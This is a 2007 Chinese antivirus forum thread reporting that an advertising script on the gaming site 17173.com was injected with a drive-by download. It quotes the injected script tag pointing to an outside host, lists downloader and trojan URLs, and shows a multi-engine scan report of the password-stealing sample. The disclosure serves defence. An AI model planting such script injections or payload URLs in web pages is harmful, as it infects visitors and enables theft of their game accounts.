» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 主动防御 » [2007-12-03 01:14] 微点杀 17173被挂REAL漏洞的网马   作者: 标题: [2007-12-03 01:14] 微点杀 17173被挂REAL漏洞的网马 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #1  [2007-12-03 01:14] 微点杀 17173被挂REAL漏洞的网马 作者dikex（六翼刺猬）[url]/*已屏蔽*/[/url] ICKA在群上说的： ICKA(3831250) (2007-12-03 00:14:54) WOW.17173.COM 挂REAL漏洞的病毒了 /*已屏蔽*/ 洗了个澡后上去看了看，挂得有点隐蔽，是在[url]/*已屏蔽*/[/url]这个js文件的最下面： document.writeln("<script src=h:\/\/al.99.vc\/0.js><\/script>"); 把0.js解密后看到一堆网马地址： /*已屏蔽*/ 随便找了几个来解密，发现指向的都是h://99.vc/s.exe，根据ICKA的测试，这个是个下载者之类的，会首先下载h://99.vc/ss.exe，之后ss.exe读取h://99.vc/ok.txt下载下面一堆： h://66.186.60.195/images/1.exe h://66.186.60.195/images/2.exe ……………… h://66.186.60.195/images/10.exe ……………… h://209.11.244.34/images/19.exe h://209.11.244.34/images/19.exe h://209.11.244.34/images/m1.exe h://209.11.244.34/images/okok.exe /*已屏蔽*/ 另外值得一提的是关于那个topBanner.js，它其实是一个对联广告来的，在17173网站里面很多的网页上面都有，也就是17173上面许多的网页都被挂马了，而不只是WOW.17173.COM上面有； 浏览17173的网游玩家的数量很多，其中不乏没有打系统和某些软件补丁的人，这可让盗号的高兴了 如下图，看到这幅对联广告的页面基本上都是有毒的，各位自己小心吧。       VirSCAN.org Scanned Report : Scanner results: 42%的杀软(15/36)报告发现病毒 File Name      : ss.exe File Size      : 29218 byte File Type      : MS-DOS executable (EXE), OS/2 or MS Windows MD5            : 4a70fbe3faf0bbf6abe68c8e1708408c SHA1           : ddebee3a2dcd047c12a71e84c21b8e181c837576 Online report  : http://virscan.org/report/fcc5a51df31d9c7673b4cbb9e1037266.html Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result a-squared      3.0.0.126       2007.11.28        2007-11-28  2.85   - 安博士V3       2007.11.29.00   2007.11.29        2007-11-29  0.88   - AntiVir        7.6.0.35        7.0.1.31          2007-11-30  2.31   TR/Autorun.BK Arcavir        1.0.4           200711301332      2007-11-30  1.48   - AVAST          1.0.8           071202-0          2007-12-02  3.04   Win32:AutoRun-U AVG            7.5.49.442      269.16.10/1160    2007-11-29  1.82   - BitDefender    7.60825.957544  7.16072           2007-12-03  3.38   Trojan.PWS.Delf.IFD CA (VET)       9.0.0.143       31.3.5340         2007-12-01  0.76   Win32/Bancos.IHV trojan. ClamAV         0.91.2          4975              2007-12-03  0.50   - Comodo         2.11            2.0.0.361         2007-12-02  0.80   - CP Secure      1.1.0.655       2007.12.02        2007-12-02  4.63   - Dr.WEB         4.44.0.9170     2007.12.02        2007-12-02  3.29   Trojan.PWS.Qqpass.origin ewido          4.0.0.2         2007.12.02        2007-12-02  1.85   - F-PROT         4.4.1.52        20071130          2007-11-30  1.31   - F-SECURE       5.51.6100       2007.11.29.09     2007-11-29  3.02   - 飞塔           2.81-3.11       8.444             2007-12-02  1.95   - ViRobot        20071129        2007.11.29        2007-11-29  0.37   - IKARUS         T3.1.01.15      2007.11.26.69895  2007-11-26  1.26   Virus.Win32.AutoRun.u 江民杀毒       10.00.650       2007.12.02        2007-12-02  1.10   - 卡巴斯基       5.5.10          2007.12.02        2007-12-02  4.55   - 金山毒霸       2007.6.20.249   2007.12.1         2007-12-01  0.64   Win32.Troj.Snipe.f.102447 迈克菲         5.2.00          5175              2007-11-30  1.20   PWS-QQPass MKS_VIR        2.01            2007.12.02        2007-12-02  2.39   - NOD32          2.70.10         2697              2007-12-02  0.09   probably a variant of Win32/PSW.OnLineGames.NBR trojan NORMAN         5.91.08         5.90              2007-11-29  3.63   W32/QQPass.GEA 熊猫卫士       9.04.03.0001    2007.12.01        2007-12-01  2.70   - 趋势           8.500-1001      4.856.43          2007-12-02  0.07   - Prevx          V2              20071202          2007-12-02  3.64   TROJAN.DOWNLOADER.GEN QuickHeal      9.00            2007.12.01        2007-12-01  2.06   - 瑞星           19.0            20.20.62.00       2007-12-02  1.87   - SOPHOS         2.49.1          4.21              2007-12-02  4.04   Mal/PWS-K 赛门铁克       1.3.0.24        20071202.001      2007-12-02  0.40   - nProtect       2007-12-01.00   1074407           2007-12-01  8.05   Trojan.PWS.Delf.IFD The Hacker     6.2.9           v00147            2007-12-01  0.72   - VBA32          3.12.2.5        20071202.0223     2007-12-02  0.98   Trojan-PSW.Game.1 (paranoid heuristics) (suspicious) VirusBuster    4.3.19:9        9.115.16/11.0     2007-12-01  1.31   Trojan.QQPass.Gen.4 [ Last edited by 点饭的百度空间 on 2007-12-3 at 11:02 ] ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2007-12-3 10:30 Legend 超级版主 超级版主 积分 77171 发帖 70170 注册 2005-10-29 #2   感谢楼主的反馈，请楼主将样本发送到我们virus@micropoint.com.cn 邮箱，我们好及时分析解决，请随信附带此贴链接 您发送完后，请通过论坛短消息将您的邮箱地址发给我，也请附带此贴链接 ※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※ 微点官方认证新浪微博：欢迎进入 微点新浪微博 微点技术支持邮箱: support@micropoint.com.cn 给Legend发短消息 2007-12-3 11:00 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #3   文中已经写了 h://99.vc/ss.exe ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2007-12-3 11:01 Legend 超级版主 超级版主 积分 77171 发帖 70170 注册 2005-10-29 #4   请您通过邮件向我们反馈一下，谢谢您的合作 ※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※ 微点官方认证新浪微博：欢迎进入 微点新浪微博 微点技术支持邮箱: support@micropoint.com.cn 给Legend发短消息 2007-12-3 11:04 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #5   好的 ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2007-12-3 11:04 逻辑锁 新手上路 积分 2 发帖 2 注册 2009-2-25 来自 江民 #6   特来顶微点 ※ ※ ※ 本文纯属【逻辑锁】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2009-2-25 11:18 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号